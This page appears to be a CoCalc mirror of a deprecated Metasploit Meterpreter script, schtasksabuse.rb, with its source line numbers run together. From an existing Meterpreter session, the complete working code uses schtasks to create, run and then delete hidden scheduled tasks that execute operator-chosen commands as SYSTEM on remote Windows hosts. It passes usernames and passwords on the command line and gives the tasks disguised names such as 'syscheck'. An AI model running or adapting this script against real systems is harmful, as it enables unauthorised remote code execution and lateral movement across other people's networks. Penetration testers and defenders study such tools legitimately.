CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/scripts/meterpreter/schtasksabuse.rb
Views: 1904
##1# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.2# If you'd like to improve this script, please try to port it as a post3# module instead. Thank you.4##5678#Meterpreter script for abusing the scheduler service in windows9#by scheduling and running a list of command against one or more targets10#using schtasks command to run them as system. This script works with Windows XP,11#Windows 2003, Windows Vista and Windows 2008.12#Version: 0.1.113#Note: in Vista UAC must be disabled to be able to perform scheduling14#and the meterpreter must be running under the profile of local admin15#or system.16################## Variable Declarations ##################17session = client18# Setting Arguments19@@exec_opts = Rex::Parser::Arguments.new(20"-h" => [ false,"Help menu." ],21"-c" => [ true,"Commands to execute. Several commands can be given but separated by commas and enclose the list in double quotes if arguments are used."],22"-u" => [ true,"Username to schedule task, if none is given the current user credentials will be used."],23"-p" => [ true,"Password for user account specified, it must be given if a user is given."],24"-d" => [ true,"Delay between the execution of commands in seconds, default is 2 seconds if not given."],25"-t" => [ true,"Remote system to schedule job."],26"-l" => [ true,"Text file with list of targets, one per line."],27"-s" => [ true,"Text file with list of commands, one per line."]28)29#Setting Argument variables30commands = []31targets = []32username = nil33password = nil34delay = 235help = 036def usage37print_status( "This Meterpreter script is for running commands on targets system using the")38print_status( "Windows Scheduler, it is based on the tool presented but not released by Val Smith")39print_status( "in Defcon 16 ATAbuser. If no user and password is given it will use the permissions")40print_status( "of the process Meterpreter is running under.")41print_status( "Options:")42print_status( @@exec_opts.usage )43end44def abuse(session,targets,commands,username,password,delay)45#for each target46targets.each do |t|47next if t.strip.length < 148next if t[0,1] == "#"49#for each command50commands.each do |c|51next if c.strip.length < 152next if c[0,1] == "#"53taskname = "syscheck#{rand(100)}"54success = false55#check if user name and password where given, if not credential of running process used56if username == nil && password == nil57print_status("Scheduling command #{c} to run .....")58execmd = "schtasks /create /tn \"#{taskname}\" /tr \"#{c}\" /sc once /ru system /s #{t} /st 00:00:00"59r = session.sys.process.execute("cmd.exe /c #{execmd}", nil, {'Hidden' => 'true','Channelized' => true})60#check if successfully scheduled61while(d = r.channel.read)62if d =~ /successfully been created/63print_status("The scheduled task has been successfully created")64success = true65end66end67#check if schedule successful, if not raise error68if !success69print_status("Failed to create scheduled task!!")70raise "Command could not be Scheduled"71elsif success72print_status("Running command on #{t}")73session.sys.process.execute("cmd.exe /c schtasks /run /tn #{taskname} /s #{t}")74end75r.channel.close76r.close77#Wait before scheduling next command78sleep(delay)79print_status("Removing scheduled task")80session.sys.process.execute("cmd.exe /c schtasks /delete /tn #{taskname} /s #{t} /F")81else82print_status("Scheduling command #{c} to run .....")83execmd = "schtasks /create /tn \"#{taskname}\" /tr \"#{c}\" /sc once /ru system /s #{t} /u #{username} /p #{password} /st 00:00:00"84r = session.sys.process.execute("cmd.exe /c #{execmd}", nil, {'Hidden' => 'true','Channelized' => true})85#check if successfully scheduled86while(d = r.channel.read)87if d =~ /successfully been created/88print_status("The scheduled task has been successfully created")89success = true90end91end92#check if schedule successful, if not raise error93if !success94print_status("Failed to create scheduled task!!")95raise "Command could not be Scheduled"96elsif success97print_status("Running command on #{t}")98session.sys.process.execute("cmd.exe /c schtasks /run /tn #{taskname} /s #{t} /u #{username} /p #{password}")99end100r.channel.close101r.close102#Wait before scheduling next command103sleep(delay)104print_status("Removing scheduled task")105session.sys.process.execute("cmd.exe /c schtasks /delete /tn #{taskname} /s #{t} /u #{username} /p #{password} /F")106end107end108end109end110111#check for proper Meterpreter Platform112def unsupported113print_error("This version of Meterpreter is not supported with this Script!")114raise Rex::Script::Completed115end116117118@@exec_opts.parse(args) { |opt, idx, val|119case opt120121when "-c"122commands = val.split(',')123when "-u"124username = val125when "-p"126password = val127when "-t"128targets = val.split(',')129when "-d"130delay = val.to_i131when "-s"132script = val133if not ::File.exist?(script)134raise "Command List File does not exist!"135else136::File.open(script, "r").each_line do |line|137commands << line.chomp138end139end140when "-l"141list = val142if not ::File.exist?(list)143raise "Command List File does not exist!"144else145::File.open(list, "r").each_line do |line|146targets << line.chomp147end148end149when "-h"150help = 1151end152153}154155unsupported if client.platform != 'windows'156print_status("Meterpreter session running as #{session.sys.config.getuid}")157if help == 0 && commands.length != 0158abuse(session,targets,commands,username,password,delay)159else160usage161end162163164